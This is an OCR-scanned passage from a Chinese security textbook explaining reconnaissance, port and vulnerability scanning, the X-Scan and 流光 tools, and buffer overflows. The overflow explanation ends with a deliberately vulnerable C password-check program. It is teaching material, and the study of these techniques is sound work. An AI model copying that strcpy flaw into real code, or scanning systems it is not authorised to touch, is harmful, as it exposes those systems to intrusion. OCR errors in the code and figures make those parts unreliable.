在 一 些 扫描 工具 中 ,把 这 些 方法 集成 到 了 工具 中 ,例如 nmap。 另 外 ,xprobe2 也 是 常用 
的 踩点 工具 。 

在 侦查 的 过 程 中 ,还 会 用 到 嗅 探 工具 ,这 些 工具 能 从 某 些 网 络 介质 捕获 数据 包 , 甚 至 能 
够 看 到 数据 包 中 未 经 加 密 的 信息 。 通 过 分 析 这 些 信息 ,可 以 获取 相当 多 关于 目标 主机 的 信 
息 ,当然 也 可 能 会 包括 没有 经 过 加 密 的 用 户 名 、 密 码 等 。 在 后 面 的 实验 中 ,会 详细 地 讲述 
Ethereal 这 个 工具 的 使 用 。 

下 一 步 双 的 扫描 则 可 以 获取 更 多 信息 ,为 后 面 的 攻击 步 又 打下 基础 。 


92 扫 描 


黑客 技术 中 的 扫描 主要 是 指 通 过 固定 格式 的 询问 来 试探 主机 的 某 些 特 征 的 过 程 ,而 提 
供 了 扫描 功能 的 软件 工具 就 是 扫描 器 。 

扫描 器 对 不 同 的 使 用 者 来 说 ,其 意义 不 同 。 对 于 系统 管理 员 来 说 ,扫描 器 是 维护 系统 安 
全 的 得 力 助手 ; 对 于 黑客 而 言 ,扫描 器 是 最 基本 的 攻击 工具 ,有 一 句 话 可 以 充分 说 明 扫描 器 
对 黑客 的 重要 性 ,一 个 好 的 扫描 器 相当 于 数 百 个 合法 用 户 的 账户 信息 ”。 
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扫描 器 可 以 检测 远程 主机 和 本 地 系统 的 安全 性 ， 
对 远程 主机 和 本 地 系统 进行 扫描 是 有 区 别 的 。 对 远程 
主机 进行 扫描 属于 远程 扫描 , 即 扫描 远程 主机 的 一 些 一 1! 加 载 中 


外 部 特性 ,这 些 外 部 特性 是 由 远程 主机 开放 的 服务 决 上 | 


定 的 。 对 本 地 系统 进行 扫描 属于 本 地 扫描 ,通常 是 以 一 
系统 管理 员 权限 进行 的 扫描 。 和 

大 多 数 扫描 器 按照 如 图 9-1 所 示 的 工作 流程 工 图 9-1 扫描 器 的 工作 流程 
作 。 其 类 型 主要 包括 端口 扫描 和 漏洞 扫描。 


921 端口 扫描 


如 果 把 网 络 中 的 每 一 台 计算 机 比喻 成 一 座 城堡 ,那么 在 这 些 城堡 中 ,有 的 对 外 完全 开 
放 , 有 的 却 是 紧 锁 城 门 。 入 侵 者 们 是 如 何 找到 ,并 打开 它们 的 城 门 的 呢 ? 这 些 城 门 究 竟 通 向 
城堡 的 何 处 呢 ? 

在 网 络 技术 中 ,把 这 些 城堡 的 “ 城 门 ? 称 为 计算 机 的 “端口 "。 端 口 扫描 是 入 侵 者 搜集 信 
息 的 几 种 常用 手法 之 一 ,也 正 是 这 一 过 程 最 容易 使 人 侵 者 暴露 自己 的 身份 和 意图 。 一 般 来 
说 ,扫描 端口 的 主要 目的 是 判断 目标 主机 的 操作 系统 以 及 开放 了 哪些 服务 。 如 果 入 侵 者 掌 
握 了 目标 主机 开放 了 哪些 服务 ,运行 何 种 操作 系统 ,他 们 就 能 够 使 用 相应 的 手段 实现 入侵 。 


1. 端口 的 基本 概念 


“端口 ?在 计算 机 网 络 领域 中 是 个 非常 重要 的 概念 。 它 是 专门 为 计算 机 通信 而 设计 的 ， 
它 不 是 硬件 ,不同 于 计算 机 中 的 “ 插 槽 ”, 可 以 说 是 个 “ 软 搬 槽 ”。 如 果 有 需要 的 话 , 一 台 计 算 
机 中 可 以 有 上 万 个 端口 。 

端口 是 由 计算 机 的 通信 协议 TCP/IP 协议 定义 的 。 其 中 规定 ,用 IP 地 址 和 端口 作为 套 
接 字 , 它 代表 TCP 连接 的 一 个 连接 端 ,一 般 称 为 Socket。 具 体 来 说 ,就 是 用 [IP: 端口 ] 来 定 
位 一 台 主 机 中 的 进程 。 可 以 做 这 样 的 比喻 ,端口 相当 于 两 台 计 算 机 进程 间 的 大 门 ,可 以 随便 
定义 ,其 目的 只 是 为 了 让 两 台 计算 机 能 够 找到 对 方 的 进程 。 计 算 机 就 像 一 座 大 楼 ,这 个 大 楼 
有 很 多 人 口 ( 端 口 ) , 进 到 不 同 的 人 口中 就 可 以 找到 不 同 的 公司 (进程 )。 如 果 要 和 远程 主机 
A 的 程序 通信 ,那么 只 要 把 数据 发 向 [A: 端口 ] 就 可 以 实现 通信 了 。 

可 见 , 端 口 与 进程 是 一 一 对 应 的 ,如 果 某 个 进程 正在 等 待 连接 , 称 之 为 该 进程 正在 监听 ， 
那么 就 会 出 现 与 它 相 对 应 的 端口 。 由 此 可 见 , 入 侵 者 通过 扫描 端口 , 便 可 以 判断 出 目标 计算 
机 有 哪些 通信 进程 正在 等 待 连接 。 


2. 端口 的 分 类 


端口 是 一 个 16bit 的 地 址 ,用 端口 号 进行 标识 不 同 作用 的 端口 。 端 口 一 般 分 为 两 类 。 

熟知 端口 (公认 端口 ): 由 因特网 指派 名 字 和 号 码 公司 ICANN 负责 分 配给 一 些 常用 的 
应 用 层 程序 固定 使 用 的 熟知 端口 ,端口 号 一 般 为 0 一 1023。 表 9-2 和 表 9-3 列 出 了 常见 的 熟 
知 端口 。 

一 般 端口 : 用 来 随时 分 配给 请 求 通信 的 客户 进程 。 
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表 9-2 常见 TCP 熟知 端口 


服务 名 称 端口 号 说 明 
FTP 21 文件 传送 服务 
Telnet 23 远程 登录 服务 
HTTP 80 超 文本 传送 协议 
POP3 110 邮件 服务 
SMTP 25 简单 邮件 传送 协议 
Socks 1080 代理 服务 


表 9-3 常见 UDP 熟知 端口 


服务 名 称 端口 号 说 明 
RPC 111 远程 调用 
SNMP 161 简单 网 络 管理 协议 
TFTP 69 简单 文件 传输 


入 侵 者 如 果 想 要 探测 目标 计算 机 开放 了 哪些 端口 .提供 了 哪些 服务 ,就 需要 先 与 目标 端 
口 建立 TCP 连接 ,这 也 就 是 “扫描 ”的 出 发 点 。 

尝试 与 目标 主机 的 某 些 端口 建立 连接 ,如 果 目 标 主机 该 端口 有 回复 (参考 TCP 三 次 握 
手中 的 第 二 次 ), 则 说 明 该 端口 开放 , 即 为 “活动 端口 ”。 

具体 地 ,有 如 下 几 种 扫描 方法 : 

1) 全 TCP 连接 

这 种 扫描 方法 使 用 三 次 握手 ,与 目标 计算 机 建立 标准 的 TCP 连接 。 需 要 说 明 的 是 ,这 
种 古老 的 扫描 方法 很 容易 被 目标 主机 发 觉 并 记录 。 

2) 半 开 式 扫描 (SYN 扫描 ) 

在 这 种 扫描 技术 中 ,扫描 主机 自动 向 目标 计算 机 的 指定 端口 发 送 SYN 数据 段 ,表示 发 
送 建 立 连 接 请 求 。 

(1) 如 果 目 标 计算 机 的 回应 TCP 报 文中 SYN 二 1, ACK 王 1, 则 说 明 该 端口 是 活动 的 ， 
接着 扫描 主机 传送 一 个 RST 给 目标 主机 拒绝 建立 TCP 连接 ,从 而 导致 三 次 握手 过 程 的 
失败 。 

(2) 如 果 目 标 计算 机 的 回应 是 RST, 则 表示 该 端口 为 “ 死 端 口 ”", 这 种 情况 下 ,扫描 主机 
不 用 做 任何 回应 。 

由 于 扫描 过 程 中 全 连接 尚未 建立 ,所 以 大 大 降低 了 被 目标 计算 机 的 记录 的 可 能 性 ,并 且 
加 快 了 扫描 的 速度 。 

3) FIN 扫描 

在 TCP 报 文 首部 中 ,有 一 个 字段 为 FIN,FIN 扫描 则 依靠 发 送 FIN 来 判断 目标 计算 机 
的 指定 端口 是 否 活 动 。 

发 送 一 个 FIN= 二 1 的 TCP 报 文 到 一 个 关闭 的 端口 时 ,该 报 文 会 被 丢掉 ,并 返回 一 个 
RST 报 文 。 但 是 ,如 果 当 FIN 报 文 发 到 一 个 活动 的 端口 时 .该 报 文 只 是 简单 地 被 丢掉 ,不 会 
返回 任何 回应 。 

从 FIN 扫描 可 以 看 出 ,这 种 扫描 没有 涉及 任何 TCP 连接 部 分 ,因此 ,这 种 扫描 比 前 两 
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种 都 安全 ,可 以 称 之 为 秘密 扫描 。 

4) 第 三 方 扫描 

第 三 方 扫描 又 称 “ 代 理 扫描 ”, 这 种 扫描 是 控制 第 三 方 主机 来 代 蔡 入 侵 者 进行 扫描 。 这 
个 第 三 方 主机 一 般 是 人 侵 者 通过 入 侵 其 他 计算 机 而 得 到 的 ,该 “第 三 方 ”主机 常 被 入 侵 者 称 
之 为 “肉鸡 ”。 这 些 “ 肉 鸡 ” 一 般 为 安全 防御 系数 极 低 的 个 人 计算 机 。 严 格 来 说 , 它 的 扫描 方 
式 还 是 以 上 三 种 中 的 某 一 种 ,但 即使 被 对 方 发 现 , 对 方 也 无 法 准确 得 知人 侵 者 的 真实 IP 地 
址 和 身份 ,所 以 更 加 隐蔽 。 


922 漏洞 扫描 


1. 漏洞 概述 


虽然 目前 在 软件 开发 的 过 程 中 越 来 越 重视 软件 测试 ,测试 所 耗费 的 资源 甚至 超过 了 开 
发 。 但 无 论 从 理论 上 还 是 工程 上 都 没有 任何 人 敢 声称 能 够 彻底 消灭 软件 中 的 所 有 逻辑 缺 
陷 一 一 bug。 

在 各 种 各 样 的 软件 逻辑 缺陷 中 ,有 一 部 分 会 引起 非常 严重 的 后 果 ,我 们 把 会 引起 软件 做 
一 些 超出 设计 范围 事情 的 bug 称 为 漏洞 。 

漏洞 往往 是 病毒 木马 入 侵 计 算 机 的 突破 口 。 如 果 掌 握 了 漏洞 的 技术 细节 ,能够 写 出 漏 
洞 利用 (Exploit) 程 序 , 往 往 可 以 让 目标 主机 执行 任意 代码 。 

已 发 布 软件 里 的 漏洞 分 为 已 经 被 发 现 的 漏洞 和 未 被 发 现 的 漏洞 。 

如 果 病 毒 利用 非常 严重 的 系统 漏洞 进行 传播 ,可 能 很 多 计算 机 将 在 劫难 逃 。 因 为 系统 
漏洞 可 以 引起 计算 机 被 远程 控制 ,病毒 感染 。 例 如 横扫 世界 的 冲击 波 蠕虫 、Slamer 蠕虫 等 
就 是 这 种 类 型 的 病毒 。 

如 果 服 务 器 软件 存在 安全 漏洞 .或 者 系统 中 可 以 被 RPC 远程 调用 的 函数 中 存在 缓冲 区 
溢出 漏洞 ,攻击 者 也 可 以 发 起 “主动 "进攻 。 

如 果 浏 览 器 在 解析 HTML 文件 时 存在 缓冲 区 溢出 漏洞 ,那么 攻击 者 就 可 以 精心 构造 
一 个 承载 着 恶意 代码 的 HTML 文件 , 当 有 人 单 击 这 种 链接 时 ,漏洞 被 触发 从 而 导致 HTML 
中 所 承载 的 恶意 代码 被 执行 。 这 段 代 码 通常 是 在 没有 任何 提示 的 情况 下 去 指定 的 地 方 下 载 
木马 客户 端 并 运行 。 

此 外 ,第 三 方 软件 所 加 载 的 ActiveX 控件 中 的 漏洞 也 是 被 “木马 ?所 经 常 利用 的 对 象 。 
Word 文档 .PowerPoint 文档 .Excel 表格 文档 虽然 并 非 可 执行 文件 ,但 它们 同样 导致 恶意 代 
码 的 执行 。 这 类 文档 本 身 虽然 是 数据 文件 ,但 是 如 果 Office 软件 在 解析 这 些 数据 文件 的 特 
定数 据 结构 时 存在 缓冲 区 溢出 漏洞 的 话 ,攻击 者 就 可 以 通过 一 个 精心 构造 的 Word 文档 来 
触发 并 利用 漏洞 。 当 用 Office 软件 打开 这 个 Word 文档 的 时 候 ,一 段 恶意 代码 可 能 已 经 悄 
无 声息 地 被 执行 过 了 。 

软件 漏洞 的 技术 细节 是 非常 宝贵 的 资料 ,尤其 是 当 软 件 漏 洞 对 应 的 官方 补丁 尚未 发 布 
时 ,只 有 少数 攻击 者 秘密 的 掌握 漏洞 及 其 利用 方法 ,这 时 往往 可 以 通过 漏洞 入 侵 并 破坏 任意 
一 台 Internet 上 的 主机 。 

未 被 公开 的 漏洞 被 称 做 zero day (0 day)。 可 以 把 0 day 理解 成 未 公开 的 系统 后 门 。 由 
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于 0 day 的 特殊 性 质 和 价值 ,使 得 很 多 研究 者 和 攻击 者 投身 于 漏洞 挖掘 的 行列 。 一 个 0 day 
漏洞 的 资料 根据 其 影响 程度 的 不 同 , 在 黑市 上 可 以 卖 到 从 几 千 元 到 几 十 万 元 不 等 的 价钱 。 
因此 0 day 一 旦 被 发 现 往往 会 被 当做 商业 机 密 , 其 至 军事 机 密 。 如 果 把 冲击 波 蠕虫 的 
shellcode 从 原先 的 一 分 钟 倒计时 关机 改 为 穷 凶 极 恶 的 格式 化 硬盘 之 类 ,那么 花 一 百 万 买 这 
样 一 个 电子 炸弹 比 花 一 百 万 买 一 枚 导弹 要 划算 得 多 。 

为 了 防范 这 种 漏洞 ,最 好 的 办 法 是 及 时 为 操作 系统 和 服务 打 补 丁 。 所 谓 补 丁 , 是 软件 公 
司 为 已 发 现 的 漏洞 所 作 的 修复 行为 。 如 果 厂 商 能 够 迅速 发 布 补丁 ,那么 我 们 就 能 够 避免 应 
用 程序 因为 有 漏洞 而 长 期 暴露 在 不 安全 因素 下 。 而 对 于 有 些 漏洞 还 没有 打 补丁 的 ,就 要 依 
靠 其 他 一 些 安全 手段 ,例如 防火 墙 和 入侵 检测 系统 ,以 及 安全 人 员 的 经 验 。 例 如 ,安全 人 员 
可 以 考虑 ,目前 机 器 上 所 开放 的 服务 是 否 为 必需 的 ,如 果 不 是 ,把 它 关 闭 。 服 务 可 以 公开 访 
间 吗 ? 如 果 不 能 , 则 用 防火 墙 隔 离 。 所 有 不 安全 的 选项 都 关闭 了 吗 ? 如 果 没 有 , 则 关闭 。 


2. 漏洞 扫描 


漏洞 扫描 通常 通过 漏洞 扫描 器 来 执行 。 漏 洞 扫描 器 是 通过 在 内 部 放置 已 知 漏洞 的 特 
征 , 然 后 把 被 扫描 系统 特征 和 已 知 漏洞 相 比 对 ,从 而 获取 被 扫描 系统 漏洞 的 过 程 。 

需要 注意 的 是 ,漏洞 扫描 只 能 找 出 目标 机 上 已 经 被 发 现 并 且 公 开 的 漏洞 ,不 能 找 出 还 未 
被 发 现 的 漏洞 ,并 且 只 能 扫描 出 在 扫描 器 中 已 经 存在 特征 码 的 漏洞 。 

扫描 器 进行 远程 扫描 时 ,针对 远程 主机 开放 的 端口 与 服务 进行 探测 ,获取 并 记录 相关 的 
应 答 信息 ,对 应 答 信 息 进 行 筛选 和 分 析 后 ,再 与 扫描 器 自 带 的 漏洞 信息 库 中 的 信息 进行 比 
较 , 如 果 一 致 , 则 确定 远程 系统 存在 相应 的 漏洞 。 

扫描 器 进行 本 地 扫描 时 ,会 以 系统 管理 员 的 权限 在 本 地 机 上 运行 ,记录 系统 配置 中 的 各 
项 主要 参数 ,分 析 配 置 上 存在 的 漏洞 。 

通过 以 上 介绍 可 以 发 现 本 地 扫描 和 远程 扫描 之 间 的 另 一 个 差别 : 远程 扫描 时 ,扫描 器 
所 收集 的 信息 与 自 带 漏洞 信息 库 中 的 信息 一 致 时 即 确定 为 存在 相应 的 漏洞 ; 而 本 地 扫描 则 
正好 相反 ,不一致 时 确定 存在 相应 的 系统 漏洞 。 

应 该 及 时 更 新 扫描 器 的 版 本 ,一 般 的 发 布 顺序 是 系统 漏洞 首先 被 披露 ,然后 是 相关 的 补 
丁 程序 ,最 后 才 是 扫描 器 。 尽 管 如 此 ,用 户 打 补丁 并 不 一 定 及 时 ,因此 下 载 扫描 器 的 高 版 本 
是 十 分 重要 的 。 

男 外 可 以 用 多 种 扫描 器 的 搭配 使 用 ,由 于 扫描 器 设计 与 编写 目的 的 不 同 ,各 自 的 功能 和 
性 能 往往 会 有 一 定 的 差别 。 以 扫描 被 控制 了 的 远程 主机 为 例 (这 个 过 程 也 被 戏称 做 “ 抓 肉 
鸡 ”) ,可 以 先 使 用 一 些 扫描 速度 快 但 功能 少 的 扫描 器 扫描 多 个 网 段 中 远程 主机 ,随后 使 用 一 
些 扫描 速度 慢 但 功能 强 的 扫描 器 重点 扫描 其 中 的 一 部 分 主机 ,最 后 确定 对 哪些 远程 主机 进 
行人 侵 。 

扫描 器 归根 结 底 是 扫描 方法 的 集合 ,扫描 器 的 出 现 极 大 地 方便 了 用 户 ,但 扫描 器 并 不 是 
万 能 的 。 对 于 系统 管理 员 而 言 ,对 具体 的 扫描 方法 也 要 有 一 定 的 了 解 与 掌握 ,例如 某 个 漏洞 
刚 被 发 现时 , 它 对 应 的 扫描 器 往往 不 会 同期 被 发 布 , 漏 洞 的 存在 对 系统 构成 了 潜在 的 威胁 ， 
这 种 情况 下 ,可 以 通过 端口 检测 等 一 些 扫描 方法 加 以 检查 。 


151 


152 


信息 安全 原理 及 应 用 


923 实用 扫描 器 简介 


虽然 对 扫描 有 多 种 分 类 ,例如 弱 口 令 扫 描 \ 系 统 漏 洞 扫描 、 主 机 服务 扫描 等 数 十 种 方式 ， 
但 归根 结 底 还 是 寻找 系统 或 者 网 络 的 漏洞 ,所 以 可 以 归 到 漏洞 扫描 一 类 。 

早期 的 扫描 器 大 多 是 专用 的 , 即 一 种 扫描 器 只 能 扫描 一 种 特定 的 信息 。 随 着 网 络 的 发 
展 , 各 种 系统 漏洞 被 越 来 越 多 的 发 现 , 扫 描 器 的 种 类 也 随 之 增多 ,为 了 简化 扫描 过 程 ,人 们 把 众 
多 的 扫描 器 集成 为 一 个 扫描 器 。 目 前 ,正在 使 用 的 扫描 器 中 , 绝 大 多 数 都 是 这 种 综合 扫描 器 。 

单 从 危害 来 看 ,黑客 进行 对 远程 主机 进行 本 地 扫描 的 危害 更 大 ,这 时 说 明 黑 客 已 经 侵入 
了 系统 。 此 时 ,查找 出 黑客 打开 的 后 门 并 加 以 封锁 是 亡羊补牢 成 功 与 否 的 关键 。 

此 外 ,对 于 远程 扫描 无 法 主动 防范 ,因为 远程 扫描 可 能 存在 于 网 络 的 任何 一 个 位 置 上 。 
关闭 不 必要 的 服务 与 端口 、 及 时 安装 各 种 补丁 程序 可 以 从 一 定 程 度 上 减少 远程 扫描 带 来 的 
安全 隐患 。 

X-Scan 和 “流光 "是 国内 最 有 名 的 两 款 扫描 工具 。 


1. 扫描 器 X-Scan 


X-Scan 是 国内 最 著名 的 综合 扫描 器 之 一 , 它 完全 免费 ,是 不 需要 安装 的 绿色 软件 ,界面 
支持 中 文 和 英文 两 种 语言 ,包括 图 形 界面 和 命令 行 方 式 。 主 要 由 国内 著名 的 网 络 安 全 组 织 
“安全 焦点 ”(http://www. xfocus. net) 完 成 。X-Scan 把 扫描 报告 和 安全 焦点 网 站 相连 接 ， 
对 扫描 到 的 每 个 漏洞 进行 风险 等 级 评估 ,并 提供 漏洞 描述 漏洞 溢出 程序 ,方便 网 管 测试 、 修 
补漏 洞 。X-Scan 的 运行 界面 如 图 9-2 所 示 。 

X-Scan v3.3 GUI 
文件 (Y) 设置 (w) 查看 (x) 工具 (W) Language 攻 助 (2 


OPhe| 国 | 国定 
普通 信息 | 漏洞 信息 | 独 误 信息 | 


-Scan-v3.3 使 用 说 明 


一， 系统 要 求 : Windovs ET/2000/XP/2003 


直行 ngs 人 作 系 统 ， 推荐 运行 于 Windows 


| 二 .功能 简介 : 

和 柳生 4 人 i 
口 
| 几 个 大 类 。 对 人 放生 二 


图 9-2 X-Scan 的 运行 界面 


X-Scan 能 够 实现 下 列 漏洞 的 扫描 : 

(1) 能 够 扫描 出 NT-Server 弱 口 令 : 探测 NT 主机 用 户 名 密码 是 否 过 于 简单 。 

(2) NetBIOS 信息 : NetBIOS( 网 络 基本 输入 输出 协议 ) 通 过 139 端口 提供 服务 。 默 认 
情况 下 存在 。 可 以 通过 NetBIOS 获取 远程 主机 信息 。 

(3) SNMP 信息 : 探测 目标 主机 的 SNMP( 简 单 网 络 管理 协议 ) 信 息 。 通 过 对 这 一 项 的 
扫描 ,可 以 检查 出 目标 主机 在 SNMP 中 不 正当 的 设置 。 
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(4) FTP 弱 口 令 : 探测 FTP 服务 器 (文件 传输 服务 器 ) 上 密码 设置 是 否 过 于 简单 或 多 
许 匿 名 登录 。 

(5) SQL-Server 弱 口 令 : 如 果 SQL-Server( 数 据 库 服务 器 ) 的 管理 员 密 码 采 用 默认 设 
置 或 设置 过 于 简单 ,如 123 abc 等 ,就 会 被 X-Scan 扫描 出 SQL-Server 弱 口 令 。 

(6) POP3 弱 口 令 : POP3 是 一 种 邮件 服务 协议 ,专门 用 来 为 用 户 接收 邮件 。 选 择 该 项 
后 ,X-Scan 会 探测 目标 主机 是 否 存在 POP3 弱 口 令 。 

(7) SMTP 漏洞 : SMTP( 简 单 邮件 传输 协议 ) 漏 洞 指 SMTP 协议 在 实现 过 程 中 的 出 现 
的 缺陷 。 

2. 流光 


“流光 ”的 运行 界面 如 图 9-3 所 示 。 它 可 以 探测 POP3、FTP、HTTP、Proxy、Form、 
SQL、SMTP 、IPC$ 等 各 种 漏洞 ,并 针对 各 种 漏洞 设计 了 不 同 的 解决 方案 ,能够 在 有 漏洞 的 
系统 上 轻易 得 到 被 探测 的 用 户 密码 。 除 了 能 够 像 X-Scan 那样 扫描 众多 漏洞 、 弱 口令 外 , 它 
还 集成 了 常用 的 入 侵 工 具 , 如 字典 工具 .NTVIIS 工具 等 ,还 独创 了 能 够 控制 第 三 方 主机 进 
行 扫描 的 “流光 Sensor 工具 ”和 为 第 三 方 主机 安装 服务 的 “种 植 者 工具 。 


水 熔 软件 -流光 5.0】 了 Build 3310 (0 用 户 ) 


口 更 目标 主机 使 用 中 的 问题 , 在 [帮助 ] 中 都 有 详细 说 明 ， 请 仔细 埋 


四 

Bm En br 

和 i 066 以 上 版 本 的 Fuxay 
as en 荐 使 用 Buid 0 本 的 

口 加 FoRM 主机 

口 区 mssQ 主机 


国 4 区 软件 实验 室 1995-2002 小 榨 作 品 版 权 所 有 
[过 到 主机 


图 9-3 “流光 ”运行 界面 


93 获取 访问 权限 


网 络 攻击 的 第 二 个 步骤 是 利用 上 个 步骤 找到 的 漏洞 ,获取 系统 访问 权限 。 有 的 漏洞 可 
以 用 来 实现 人 侵 或 者 攻击 行为 。 作 为 安全 人 员 ,应 该 了 解 某 个 漏洞 是 否 是 可 被 攻击 的 。 有 
时 候 虽 然 无 法 找到 利用 该 漏洞 攻击 的 方法 ,不 意味 其 他 人 也 找 不 到 ,这 只 是 时 间 和 技术 水 平 
的 问题 。 
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一 般 来 说 ,通过 漏洞 扫描 器 所 找到 的 漏洞 ,往往 都 是 可 以 被 人 侵 者 所 利用 的 漏洞 。 
931 缓冲 区 溢出 


1. 溢出 原理 


最 典型 的 漏洞 利用 方法 是 利用 漏洞 实现 缓冲 区 溢出 ,以 达到 获取 系统 访问 权限 的 目 
的 。 缓 冲 区 溢出 就 好 比 是 把 2 升 的 水 倒 入 1 升 的 水 缸 中 ,肯定 会 有 一 部 分 水 溢出 并 且 造 成 
混乱 。 

内 存 缓冲 区 用 来 存储 数据 ,而 缓冲 区 自身 缺乏 相关 的 机 制 来 防止 在 保留 空间 内 放 人 过 
多 的 数据 。 实 际 上 ,如果 程 序 员 比较 粗心 ,数据 可 能 很 快 超出 分 配 的 空间 。 例 如 ,以 下 语句 
声明 了 一 个 在 内 存 中 占 10 个 字 节 的 字符 串 : 

Char str1[10]; 


编译 器 为 缓冲 区 划分 了 10 个 字 节 大 小 的 空间 ,从 strl[0] 到 strl[9], 每 个 都 分 别 占用 
一 个 字 节 的 空间 。 那 么 ,执行 下 列 语句 : 


Strcpy(strl1, 'AAAAAAAAAAAAAAAAAAAAAA') ; 


则 会 造成 缓冲 区 溢出 。 因 为 strcpy 这 个 函数 根本 就 不 会 检查 后 面 的 字符 串 是 否 比 strl 所 
分 配 的 空间 要 大 。 当 然 ,这 种 溢出 比较 明显 ,程序 员 很 容易 发 现 。 假 设 我 们 采用 的 语句 是 : 


Stri[i] = ‘A's 


那么 ,直到 i 在 执行 过 程 中 被 设置 成 一 个 大 到 越界 的 下 标 之 前 ,我 们 都 无 法 检查 出 这 个 错 
误 。 如 果 在 执行 过 程 中 ,系统 能 产生 一 个 下 标 越界 错误 的 警告 即 可 发 现 溢出 ,但 遗憾 的 是 ， 
在 一 些 语言 中 ,例如 C, 很 多 情况 下 都 不 检查 缓冲 区 大 小 ,也 不 检查 越界 。 

如 果 更 加 深入 地 研究 ,潜在 的 缓冲 区 溢出 只 有 在 某 些 情况 下 才能 造成 严重 的 后 果 , 这 取 
决 于 临近 strl 数组 的 内 容 是 什么 。 例 如 ,假定 strl 数组 的 10 个 元 素 都 用 字母 A 来 填充 , 错 
误 的 越界 填充 则 用 字母 B, 如 下 所 示 : 

For(i=0; i<=9; i++) 

Stri[i] = 'A'; 

Strl[10] = 'B'; 

执行 过 程 中 ,所 有 程序 和 数据 元 素 都 在 内 存 中 ,它们 与 操作 系统 、 其 他 代码 和 常 驻 程序 
共享 内 存 空间 ,所 以 B 的 存储 位 置 有 四 种 情形 : 

(1) 如 果 这 个 额外 的 字符 B 溢出 到 用 户 的 数据 空间 ,如 图 9-4 所 示 。 它 仅仅 会 覆盖 一 
个 存在 的 变量 值 ,也 可 能 会 写 到 一 个 还 未 使 用 的 位 置 ,可 能 会 影响 程序 的 运行 结果 ,但 不 会 
影响 其 他 的 程序 或 数据 。 

用 户 数据 用 户 数 据 


内 存 : | 小 


> 


AIA AlA Al B 


图 9-4 溢出 影响 用 户 的 数据 
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(2) 如 果 B 被 送 到 用 户 的 程序 区 域 ,如 图 9-5 所 示 。 如 果 它 覆盖 了 一 条 已 执行 的 指令 ， 
且 该 指令 以 后 都 不 会 再 执行 ,用 户 不 会 觉察 到 影响 。 如 果 它 覆盖 的 是 一 条 还 没有 执行 的 指 
令 , 由 于 B 的 内 码 是 0x42, 机 器 会 尝试 执行 操作 码 为 0x42 的 指令 。 如 果 这 个 操作 码 为 
0x42 的 指令 并 不 存在 ,系统 会 由 于 一 个 非法 指令 异常 而 停机 。 结 果 出 现 段 错误 ,程序 崩溃 。 
如 果 该 指令 存在 ,机 器 就 会 执行 它 ,运行 结果 取决 于 上 下 文 含义 。 
二 用 户 数据 用 户 程序 代码 。 
内 存 : | | Aj^ 


TIT 


区 时 


图 9-5 溢出 影响 用 户 的 代码 


(3) 如 果 数 组 后 面 紧 跟 着 系统 数据 ,如 图 9-6 所 示 。 和 溢出 到 用 户 空间 的 流程 类 似 , 但 
造成 的 后 果 更 严重 。 这 种 情形 下 ,B 覆盖 了 系统 的 数据 空间 ,可 能 是 一 个 存在 的 变量 值 ,可 
能 会 让 系统 用 错误 的 数值 进行 计算 。 

用 户 数据 系统 数据 


过 
内 存 : | 


时 .本 


图 9-6 ”溢出 影响 系统 数据 


(4) 如 果 数 组 后 面 紧 跟着 系统 代码 ,如 图 9-7 所 示 。 系 统 可 能 会 执行 操作 码 为 0x42 的 
指令 。 但 是 假如 覆盖 系统 程序 代码 的 数值 不 是 字母 B, 而 是 精心 设计 的 一 段 代码 ,结果 则 可 
能 是 系统 执行 了 那 段 代码 。 


用 户 数据 系统 程序 代码 。 


a 
内 存 : | | A Alalalalala 


区 - 世 


图 9-7 溢出 影响 系统 代码 


所 以 洪 出 的 结果 一 般 有 如 下 几 种 情况 : 

第 一 种 情况 是 拒绝 服务 。 也 就 是 可 能 出 现 内 存 访问 违例 ,出 现 段 错误 ,程序 崩溃 。 第 二 
种 情况 是 ,当下 一 条 需要 执行 的 指令 被 改写 后 ,以 普通 用 户 的 身份 执行 了 恶意 代码 。 第 三 种 
情况 ,也 是 最 坏 的 情况 ,是 下 一 条 指令 被 改写 后 ,在 系统 级 别 执行 了 恶意 代码 ,这 里 的 恶意 代 
码 往往 是 Shellcode。 

Shellcode 是 一 段 代 码 ( 也 可 以 是 填充 数据 ), 是 用 来 发 送 到 服务 器 利用 特定 漏洞 的 代 
码 ,一 般 可 以 获取 权限 。 另 外 ,Shellcode 一 般 是 作为 数据 发 送 给 被 攻击 方 的 。 


2. 溢出 实例 


我 们 以 一 个 实例 来 了 解 缓冲 区 溢出 引起 的 恶性 后 果 : 


# include< stdio. h> 
# define PASSWORD "1234567" 
int verify password (char * password) 
{ 
int authenticated; 
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char buffer[8]; // add local buff to be overflowed 
authenticated = strcmp(password,PASSWORD) ; 
strcpy(buffer,password); //over flowed herel! 
return authenticated; 
} 
main() 
{ 
int valid flag= 0; 
char password[ 1024]; 
while(1) 
{ 
printf("please input password: yg 
scanf(" % s" ,password); 
valid flag = verify password(password); 
if(valid_ flag) 
{ 
printf(" incorrect password!\n\n"); 
} 
else 
{ 
printf("Congratulation! You have passed the verification!\n"); 
break; 
} 
} 
} 
E 序 运行 后 将 提示 输入 密码 。 用 户 输入 的 密码 将 被 程序 与 宏 定义 中 的 1234567 比较 ， 
如 果 


码 错 误 , 提 示 验 证 错误 ,并 提示 用 户 重新 输入 ; 如 果 密 码 正 确 ,提示 正确 ,程序 退出 。 
代码 用 TC3.0 编译 链接 ,生成 可 执行 文件 。 按 照 程 序 的 设计 思路 ,只 有 输入 了 正确 的 
密码 1234567 之 后 才能 通过 验证 。 程 序 运行 情况 如 图 9-8 所 示 。 


ET 本 三 | 口交 
please input password: 1234567 
ongratulationt You have passed the verificationt 


lease input password: 81234567 
incorrect password? 


lease input password: 


图 9-8 缓冲 区 溢出 测试 


在 这 段 程序 中 ,漏洞 在 于 verify_password() 函 数 中 的 strcpy(buffer,password) 调 用 。 
由 于 程序 将 把 用 户 输入 的 字符 串 原封 不 动 地 复制 到 verify_password 函数 的 局 部 数组 char 
bufferL8] 中 ,但 用 户 的 字符 串 可 能 大 于 8 个 字符 。 当 用 户 输入 大 于 8 个 字符 的 缓冲 区 尺寸 
时 ,缓冲 区 就 会 溢出 , 即 所 谓 的 缓冲 区 溢出 漏洞 。 

根据 缓冲 区 溢出 发 生 的 具体 情况 ,巧妙 地 填充 缓冲 区 不 但 可 以 避免 崩溃 ,还 能 影响 到 程 
序 的 执行 流程 ,甚至 让 程序 去 执行 缓冲 区 里 的 代码 。 

函数 verify_password() 里 申请 了 两 个 局 部 变量 : int authenticated 人 char buffer[8]。 
